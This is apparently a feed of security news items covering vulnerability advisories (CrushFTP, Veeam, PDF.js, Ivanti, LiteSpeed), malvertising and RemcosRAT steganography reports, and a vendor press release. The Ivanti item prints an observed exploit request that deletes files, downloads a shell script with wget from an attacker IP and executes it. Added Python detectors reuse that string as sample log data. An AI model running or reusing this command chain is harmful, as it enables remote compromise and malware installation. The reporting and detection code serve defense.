CYBERSECURITY / DEFENSE / INTELLIGENCE

  • Security Risk Advisors (SRA) announces the launch of their OT/XIoT Detection Selection Workshop, a complimentary offering designed to assist organizations in selecting the most suitable operational technology (OT) and Extended Internet of Things (XIoT) security tools for their unique environments.

    Led by seasoned OT/XIoT security consultants, the workshop provides participants with an invaluable opportunity to gain insights into both best-in-class and novel solutions and identify those closest to their specific needs.

    In today’s increasingly interconnected digital landscape, the importance of choosing the right OT/XIoT security tools cannot be overstated.

    These tools serve as the first line of risk reduction and defense against cyber threats targeting critical industrial processes and infrastructure.

    Making informed decisions, whether adding a new solution or replacing an incumbent, significantly impacts an organization’s ability to mitigate threats and protect its assets.

    During the half-day consultation, participants will delve deep into their OT/XIoT security environments, examining current tools and analyzing their infrastructure.

    The free workshop will result in personalized recommendations of the best-fit solutions from industry vendors.

    “We recognize the importance of selecting the right security tools for cyber-physical environments,” says Jason Rivera, Director of OT/XIoT Security at SRA. “Our workshop empowers organizations to make informed decisions, giving confidence that their selection is fit for purpose.”

    Submit your application here.

    About Security Risk Advisors

    Security Risk Advisors offers Purple Teams, Cloud Security, Penetration Testing, OT Security and 24x7x365 Cybersecurity Operations. Based in Philadelphia, SRA operates across the USA, Ireland and Australia. For more information, visit SRA’s website at https://sra.io.

    Contact
    Marketing Manager
    Douglas Webster
    news@sra.io
    215-867-9051

    The post Free Workshop from Security Risk Advisors Empowers Organizations to Select Optimal OT Security Tools appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • A critical vulnerability in CrushFTP, identified as CVE-2024-4040, has been actively exploited in the wild.

    It allows attackers to perform unauthenticated remote code execution on vulnerable servers.

    This severe security flaw affects versions of CrushFTP before 10.7.1 and 11.1.0, enabling attackers to bypass the Virtual File System (VFS) sandbox, gain administrative privileges, and potentially access sensitive files or execute arbitrary code remotely.


    CVE-2024-4040 – Details of the Vulnerability

    CVE-2024-4040 was initially disclosed by CrushFTP on April 19, 2024, through a private mailing list and later assigned a high severity score of 9.8.

    According to the Broadcom reports, the vulnerability allows low-privileged remote attackers to escape the VFS sandbox and perform actions beyond their designated limits without authentication.

    This flaw was initially underestimated as merely allowing file access but has since been recognized for its potential to enable full server compromise.

    Security researchers have confirmed that CVE-2024-4040 has been exploited in the wild, with some incidents possibly being state-sponsored or politically motivated.

    The attacks have targeted multiple U.S. entities, focusing on intelligence-gathering.


    Over 7,100 CrushFTP servers have been identified as publicly accessible and potentially vulnerable, highlighting the widespread risk posed by this vulnerability.

    Vendor Response and Recommendations

    Upon discovery, CrushFTP promptly released patches for the affected versions: 10.7.1 for the 10.x series and 11.1.0 for the 11.x series.

    Security experts strongly advise all users to update their software immediately to these patched versions to mitigate the risk.

    Initial recommendations to use a demilitarized zone (DMZ) have been retracted as they may not provide complete protection against this exploit.

    In addition to applying the urgent patches, organizations are encouraged to implement stringent security measures.

    This includes configuring network rules to limit CrushFTP application access to trusted clients and employing advanced detection systems to identify and respond promptly to suspicious activities.

    The exploitation of CVE-2024-4040 underscores the critical importance of maintaining up-to-date security practices and software versions.

    Organizations using CrushFTP must take immediate action to patch their systems and safeguard against potential breaches that could lead to severe data loss or system compromise.


    The post CrushFTP Vulnerability Exploited in Wild to Execute Remote Code appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Hackers have been found exploiting Google search ads to distribute malware through MSI (Microsoft Installer) packages.

    This campaign, involving the malware loader known as FakeBat, targets unsuspecting users by masquerading as legitimate software downloads.

    The Infection Chain: From Ad to Malware

    The attack begins with a Google search ad that appears legitimate, using the real website address of popular software like Notion.


    However, the ad is a facade, purchased by threat actors who have consistently used identities linked to Kazakhstan.

    According to a report from ThreatDown, hackers are using Google Search Ads to deliver MSI-packed malware.

    Clicking on the ad redirects to a lookalike site hosted at notilion[.]co.

    Clicking on the ad leads to a phishing site hosted at a deceptive URL, resembling the genuine site.

    Resembling the genuine site

    The site prompts users to download what appears to be a standard software installer in MSIX format, signed under the seemingly credible name “Forth View Designs Ltd.”

    They are using a legitimate signature under the name Forth View Designs Ltd

    Malicious Payload Delivery

    Upon executing the MSIX installer, a hidden malicious PowerShell script is activated.

    The final step in this delivery chain is the launch of the MSIX installer

    This script is responsible for connecting to the command and control server (C2) of FakeBat, initiating the download of a secondary payload known as zgRAT.

    Malicious payload

    The PowerShell commands executed during this process are designed to bypass local security measures and inject the zgRAT malware directly into system processes, effectively taking control of the infected machine.

    Network Manipulations and Malvertising Techniques

    The campaign utilizes a click tracker service to manage the effectiveness of the ad and filter out unwanted traffic.

    This step involves an intermediary domain that separates the malicious URL from the Google ad, enhancing the stealth of the attack.

    Malicious destination URL from the Google ad and the click tracker

    Once the malware is installed, the PowerShell script reaches out to the FakeBat C2 server, which dictates the subsequent actions, including the delivery of the zgRAT payload.

    ThreatDown, a cybersecurity firm, blocked the C2 used in this campaign and recorded the attack’s progression from the initial MSIX execution to the final payload deployment.


    MSIX execution

    They recommend the use of Endpoint Detection and Response (EDR) systems to monitor and block such malicious activities.

    Organizations are advised to restrict or control the use of MSIX files through group policies and to distribute software installers via an internal company repository to avoid the risks associated with malicious ads.

    This incident highlights the ongoing risks associated with malvertising and the sophistication of modern cyber threats.

    Users and organizations must remain vigilant, employing advanced security measures to protect against these deceptive and damaging attacks.

    Indicators of Compromise

    Fake Notion website: notilion[.]co

    FakeBat installer: hxxps[://]sivaspastane[.]com/Notion-x86[.]msix

    FakeBat SHA256: 80f4405270b8fd7f557c6831dd2785b55fdee43d48d967401a8b972e147be948

    MSIX execution path: C:\PROGRAM FILES\WINDOWSAPPS\NOTIONLAB.NOTION_2.0.47.1_X86__MRGZP1VAGPXMP\AI_STUBS\AISTUBX86.EXE

    FakeBat C2: utm-adrooz[.]com

    zgRAT download host: startupzonechanpatia[.]com

    zgRAT SHA256: 5102b64a838bd84f4273bce2a0bda67df77fdb1a33a2b939988ccb51f2246e07



    The post Hackers Abuse Google Search Ads to Deliver MSI-Packed Malware appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • “Defenders think in lists, attackers think in graphs,” said John Lambert from Microsoft, distilling the fundamental difference in mindset between those who defend IT systems and those who try to compromise them. The traditional approach for defenders is to list security gaps directly related to their assets in the network and eliminate as many as possible, starting with the most critical.


  • A newer version of a malware loader called Hijack Loader has been observed incorporating an updated set of anti-analysis techniques to fly under the radar. “These enhancements aim to increase the malware’s stealthiness, thereby remaining undetected for longer periods of time,” Zscaler ThreatLabz researcher Muhammed Irfan V A said in a technical report. “Hijack


  • Two critical vulnerabilities associated with remote code execution have been discovered in the Veeam Service Provider Console.

    A CVE for these vulnerabilities is yet to be assigned. These vulnerabilities exist in version 7.x and version 8.x of the Veeam Service Provider Console.


    Veeam Service Provider Console provides remote monitoring and management capabilities from a centralized user interface with API integrations.

    The company has patched these vulnerabilities in its latest release.

    Veeam RCE Flaws

    The remote code execution vulnerabilities existed due to an unsafe deserialization method in the VSPC server’s communication between the management agent and its associated components.

    Threat actors can exploit this unsafe deserialization in a specific condition and achieve remote code execution on the VSPC server machine.

    Along with fixing these RCE vulnerabilities, Veeam has also released several bug fixes and improvements on its products, such as new alarm triggers, improvements in public cloud integration, backup for Microsoft 365, and much more.

    For VSPC 8 (build 8.0.0.16877), Veeam has informed the users to check their Veeam Service Provider Console’s version 8 before installing the cumulative patch. This can be checked in the backup portal by navigating to Configuration > Support.

    As for VSPC 7, the advisory stated that the patch does not contain private fixes created after the release of P20230531 (7.0.0.14271). However, the cumulative patch was released only to address the Remote Code Execution security issue.

    Additionally, the advisory specified that Veeam Service Provider Console 7 reached its end-of-fix date in December 2023.

    Further, users of these products are recommended to upgrade to the latest versions in order to prevent the exploitation of these vulnerabilities by threat actors.


    The post Veeam RCE Flaws Let Hackers Gain Access To VSPC Servers appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • A new critical vulnerability has been discovered in PDF.js, which could allow a threat actor to execute arbitrary code when opening a malicious PDF. PDF.js allows browsers to render PDF files without any plugins or external software.

    This vulnerability affects multiple browsers and applications that use React-PDF.

    Mozilla PDF.js is the original open-source library for rendering PDF documents within a browser; React-PDF is built on Mozilla PDF.js and is used to integrate it into React applications.

    With millions of people using PDF files, this vulnerability could affect millions of PDF users as well as React applications that use React-PDF.


    Moreover, PDF.js is used by many browsers, such as Mozilla Firefox, Safari, Google Chrome, and Edge, making its threat landscape larger than ever.

    However, this vulnerability has been patched by Wojciech Maj, the React-pdf project’s maintainer.

    PDF.js is built into Mozilla Firefox as a default PDF viewer. There were two CVEs associated with this vulnerability, CVE-2024-34342 and CVE-2024-4367.

    Technical Analysis

    CVE-2024-34342: React-pdf’s PDF.js Vulnerable To Arbitrary JavaScript Execution

    This vulnerability in react-pdf can be exploited by a threat actor using a malicious PDF file.

    However, exploiting it fully requires two prerequisites: PDF.js must be used to load the malicious PDF, and PDF.js must be configured with isEvalSupported set to `true`.

    If these two conditions exist, then the threat actor will be able to execute JavaScript in the context of the hosting domain.

    The severity for this vulnerability has been given as 7.1 (High). React-pdf has patched this vulnerability by forcing `isEvalSupported` to `false` which removes the attack vector.

    CVE-2024-4367: Mozilla PDF.js Could Allow For Arbitrary Code Execution

    This vulnerability exists in the Mozilla PDF.js library which could allow a threat actor to execute arbitrary code under the context of the logged on user.

    Moreover, based on the user’s privilege, it is possible for a threat actor to exploit this vulnerability and “install programs; view, change, or delete data; or create new accounts with full user rights.”

    The vulnerability has the same root cause as the react-pdf issue: PDF.js has isEvalSupported set to true as its default value.

    The severity for this vulnerability is yet to be categorized. 

    Nevertheless, it is recommended for users to upgrade their products to the latest versions in order to prevent the exploitation of these vulnerabilities by threat actors.


    The post Critical PDF.js & React-PDF Vulnerabilities Threaten Millions Of PDF Users appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Juniper Threat Labs has reported active exploitation attempts targeting vulnerabilities in Ivanti Pulse Secure VPN appliances.

    These vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, have been exploited to deliver the Mirai botnet, among other malware, posing a significant threat to network security worldwide.


    CVE-2023-46805: Authentication Bypass

    CVE-2023-46805 is a critical security flaw affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure gateways.

    This vulnerability allows remote attackers to bypass authentication mechanisms and gain unauthorized access to restricted resources.

    The flaw resides in the /api/v1/totp/user-backup-code endpoint, which lacks sufficient security checks. This enables attackers to exploit a path traversal flaw and access public-facing areas without proper authentication.

    Affected versions include 9.x and 22.x of both Ivanti Connect Secure and Ivanti Policy Secure gateways.

    CVE-2024-21887: Command Injection

    The second vulnerability, CVE-2024-21887, is a command injection flaw found in the web components of Ivanti Connect Secure and Ivanti Policy Secure.

    This vulnerability allows attackers to send specially crafted requests to execute arbitrary commands on the appliance.

    This flaw is exploitable over the internet and involves a command injection in the /api/v1/license/keys-status/ API call.

    By exploiting the CVE-2023-46805 vulnerability to gain access to this endpoint, attackers can inject malicious payloads, which can lead to the execution of shell commands and the delivery of malware, including the Mirai botnet.


    Mirai Botnet Delivery

    Juniper Threat Labs’ analysis has revealed instances where attackers have used these vulnerabilities to deliver Mirai payloads through shell scripts.

    The following is an example of the observed request; the encoded URL decodes to:

        GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1

    The observed attack involves a command sequence that attempts to wipe files, download a script from a remote server, set executable permissions, and execute the script, potentially leading to a system infection.

    The wtf.sh script behaves as follows. Note that the file names it uses include several offensive and derogatory terms and are referenced for this research only.

    The script tries five system directories in turn: “/tmp”, “/var/run”, “/mnt”, “/root”, and “/”. Once it finds one it can reach, it downloads a file called “lol” from http://192[.]3[.]152[.]183/mips, makes the downloaded file executable, and runs it with the argument “0day_machine”.

    The “||” operator ensures that each subsequent command runs only if the earlier attempts to change directory failed, so the download and execution happen in the first reachable directory in the list.
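    The chained request shown above can be caught in access logs before wtf.sh ever runs. The following Python is an added example, not code from the Juniper Threat Labs report: it URL-decodes each request path, resolves the ../ traversal the way the appliance did, and flags requests that enter through the unauthenticated totp/user-backup-code endpoint, land on license/keys-status, and carry shell metacharacters. The Common Log Format lines, the 203.0.113.10 and 198.51.100.7 client addresses, and the severity labels are constructed for this example.

```python
"""Flag chained CVE-2023-46805 / CVE-2024-21887 exploitation attempts in access logs.

Added example, not code from the Juniper Threat Labs report.  The log lines and
the 203.0.113.10 / 198.51.100.7 client addresses are constructed for this example.
"""
import posixpath
import re
from urllib.parse import unquote

# Unauthenticated entry point (CVE-2023-46805) and the command-injection target
# (CVE-2024-21887), as they appear in the request reproduced above.
ENTRY_PREFIX = "/api/v1/totp/user-backup-code/"
TARGET = "/api/v1/license/keys-status"

# Metacharacters and tool names that have no business in a keys-status path.
SHELL_META = re.compile(r"[;|&`$]|\b(?:wget|curl|chmod|sh)\b")

# Common Log Format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)


def fully_unquote(path: str) -> str:
    """Percent-decode until stable, so double-encoded traversal is not missed."""
    while True:
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded


def analyze_request(raw_path: str) -> dict:
    """Classify one request path as benign, probe or exploit-attempt."""
    decoded = fully_unquote(raw_path.split("?", 1)[0])
    # normpath resolves "..", which is what carried the request from the
    # unauthenticated TOTP endpoint to the keys-status handler.
    normalized = posixpath.normpath(decoded)
    hits = []
    if decoded.startswith(ENTRY_PREFIX):
        hits.append("unauth-totp-endpoint")
    if ".." in decoded.split("/"):
        hits.append("path-traversal")
    reaches_target = normalized == TARGET or normalized.startswith(TARGET + "/")
    if reaches_target:
        hits.append("reaches-keys-status")
        tail = normalized[len(TARGET) + 1:]     # whatever was injected after the path
        if SHELL_META.search(tail):
            hits.append("shell-metacharacters")
    if {"path-traversal", "reaches-keys-status", "shell-metacharacters"} <= set(hits):
        severity = "exploit-attempt"
    elif "path-traversal" in hits and reaches_target:
        severity = "probe"              # traversal reached the endpoint, no command yet
    else:
        severity = "benign"
    return {"decoded": decoded, "normalized": normalized, "hits": hits, "severity": severity}


def scan_log(lines) -> list:
    """Return one finding per non-benign request, with client IP and timestamp."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue    # unparsable line; a real pipeline would count these
        result = analyze_request(m.group("path"))
        if result["severity"] != "benign":
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": m.group("status"), **result})
    return findings


# Constructed sample log: an exploit attempt (URL-encoded form of the request
# above, with a TEST-NET address), a normal login-page hit, and a bare probe.
SAMPLE_LOG = [
    '203.0.113.10 - - [15/Jan/2024:10:02:11 +0000] "GET /api/v1/totp/user-backup-code/'
    '../../license/keys-status/rm%20-rf%20*;%20cd%20/tmp;%20wget%20http://203.0.113.10/'
    'wtf.sh;%20chmod%20777%20wtf.sh;%20./wtf.sh HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Jan/2024:10:03:40 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 8841',
    '203.0.113.10 - - [15/Jan/2024:10:04:02 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/ HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f'{f["ts"]} {f["ip"]} {f["severity"]}: {", ".join(f["hits"])}')
```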

    Juniper analyzed the payloads, which have been identified as part of the Mirai botnet, indicating the severity of the threat posed by these vulnerabilities.

    Exploiting Ivanti Pulse Secure’s vulnerabilities for Mirai botnet delivery underscores the evolving landscape of cyber threats.

    Juniper Networks SRX Series Next-Generation Firewall (NGFW) customers with an IDP license are protected against these vulnerabilities using specific signatures for CVE-2023-46805 and CVE-2024-21887.

    Organizations using Ivanti Pulse Secure appliances are urged to apply the provided patches immediately and review their security posture to protect against these and future vulnerabilities.

    Indicators of Compromise

    Hash Values of Mirai: 



    The post Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Hackers are now using steganography techniques to distribute the notorious Remote Access Trojan (RAT) known as RemcosRAT.

    This method, which involves hiding malicious code within seemingly innocuous image files, marks a concerning evolution in malware delivery tactics.

    The Initial Breach: Word Documents and RTF Files

    The attack begins with a seemingly harmless Word document that contains an external link.

    This document employs a template injection technique designed to exploit vulnerabilities within the document’s processing.

    The AhnLab Security Intelligence Centre (ASEC) has recently found that steganography is being used to spread RemcosRAT.

    A Word document containing an external link

    Upon opening the document, an RTF file is downloaded and executed.

    This file exploits a known vulnerability in the equation editor component (EQNEDT32.EXE) of Microsoft Word, leading to the download of a VBScript with a misleading “.jpg” file extension from a command and control (C2) server.

    Another VBScript is fetched from “paste.ee”, a service that allows users to upload and share text snippets.

    VBScript downloaded by the RTF file

    The Steganography Technique

    The downloaded VBScript is heavily obfuscated, making it difficult for traditional antivirus software to detect the malicious intent.

    This script executes a PowerShell command, which further downloads an image from an external source.

    The obfuscated script (eh1G4)

    The cunning aspect of this attack lies within the downloaded image file.


    The image contains Base64 encoded data hidden behind the “FF D9” marker, which typically denotes the end of a JPEG file. The PowerShell script locates the data encoded between the “<<BASE64 START>>” and “BASE64_END” markers and decodes it.

    The PowerShell script downloading a steganography image

    The decoded data reveals a “.NET DLL” file, which is then executed through reflective code loading, a technique that allows code to be executed within the memory space of a process.

    The Base64-encoded data contained in a normal image file
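    The marker layout described above gives defenders a cheap triage check. The following Python is an added example, not code from the ASEC report: it finds the final FF D9 marker of a JPEG, inspects whatever follows it, and if the <<BASE64 START>> and BASE64_END markers are present, decodes and fingerprints the hidden blob. The JPEG bytes and the MZ-prefixed stand-in payload are constructed inline; no real malware is involved.

```python
"""Triage a JPEG for a payload appended after the End-Of-Image marker (FF D9).

Added example, not code from the ASEC report.  The JPEG and the "payload" are
built inline below and are inert stand-ins, not real malware.
"""
import base64
import re

SOI = b"\xff\xd8"            # start of image
EOI = b"\xff\xd9"            # end of image; a clean file ends here
START_MARK = b"<<BASE64 START>>"
END_MARK = b"BASE64_END"
B64_CHARS = re.compile(rb"[A-Za-z0-9+/=]+")


def trailing_data(jpeg: bytes) -> bytes:
    """Bytes after the last EOI marker; empty for a well-formed image."""
    if not jpeg.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    idx = jpeg.rfind(EOI)
    if idx == -1:
        raise ValueError("not a JPEG: missing EOI marker")
    # rfind is safe for this technique: the appended region is ASCII text and
    # can never contain the two-byte FF D9 sequence.
    return jpeg[idx + len(EOI):]


def extract_hidden_blob(jpeg: bytes):
    """Decode the Base64 between the markers, or None if the markers are absent."""
    tail = trailing_data(jpeg)
    start = tail.find(START_MARK)
    if start == -1:
        return None
    start += len(START_MARK)
    end = tail.find(END_MARK, start)
    if end == -1:
        return None
    # Keep only Base64 alphabet characters (drops line breaks and stray bytes).
    encoded = b"".join(B64_CHARS.findall(tail[start:end]))
    encoded += b"=" * (-len(encoded) % 4)    # tolerate stripped padding
    return base64.b64decode(encoded)


def identify(blob: bytes) -> str:
    """Minimal magic-byte check; "MZ" is what a dropped PE / .NET DLL starts with."""
    if blob.startswith(b"MZ"):
        return "pe-executable"
    if blob.startswith(SOI):
        return "jpeg"
    return "unknown"


def triage(jpeg: bytes) -> dict:
    """Summarise the file: clean, unexplained trailing data, or a stego payload."""
    tail = trailing_data(jpeg)
    blob = extract_hidden_blob(jpeg)
    if blob is not None:
        verdict = "stego-payload"
    elif tail.strip():           # whitespace-only trailers are common and harmless
        verdict = "trailing-data"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "trailing_bytes": len(tail),
        "payload_bytes": len(blob) if blob is not None else 0,
        "payload_type": identify(blob) if blob else None,
    }


# --- constructed sample input ------------------------------------------------
# Minimal JPEG: SOI, a JFIF APP0 segment, EOI.  No scan data, enough for triage.
CLEAN_JPEG = SOI + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + EOI

# Inert stand-in for the dropped DLL: PE magic followed by a text label.
FAKE_PAYLOAD = b"MZ" + b"\x00" * 6 + b"constructed stand-in, not a real DLL"

STEGO_JPEG = (
    CLEAN_JPEG
    + b"\r\n" + START_MARK + b"\r\n"
    + base64.b64encode(FAKE_PAYLOAD) + b"\r\n"
    + END_MARK + b"\r\n"
)

if __name__ == "__main__":
    for name, data in (("clean.jpg", CLEAN_JPEG), ("stego.jpg", STEGO_JPEG)):
        print(name, triage(data))
```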

    Final Execution: RemcosRAT Deployment

    The script doesn’t stop there; it downloads an additional file from the C2 server and creates a RegAsm.exe child process to execute the file using the process hollowing technique.

    This ultimately leads to the execution of RemcosRAT on the victim’s machine.

    RemcosRAT executed through process hollowing

    Given the diverse methods through which Remcos RAT can be distributed, including spam emails and disguised crack software download links, users are urged to exercise extreme caution.

    Keeping antivirus solutions updated to the latest version is also recommended to block such malware infections preemptively.

    This sophisticated use of steganography to conceal and deliver malware represents a significant shift in the landscape of cyber threats.

    As attackers continue to innovate, the importance of maintaining robust cybersecurity practices and awareness among users cannot be overstated.


    The post Hackers Employing Steganography Methods to Deliver Notorious RemcosRAT appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • A high-severity flaw impacting the LiteSpeed Cache plugin for WordPress is being actively exploited by threat actors to create rogue admin accounts on susceptible websites. The findings come from WPScan, which said that the vulnerability (CVE-2023-40000, CVSS score: 8.3) has been leveraged to set up bogus admin users with the names wpsupp‑user 
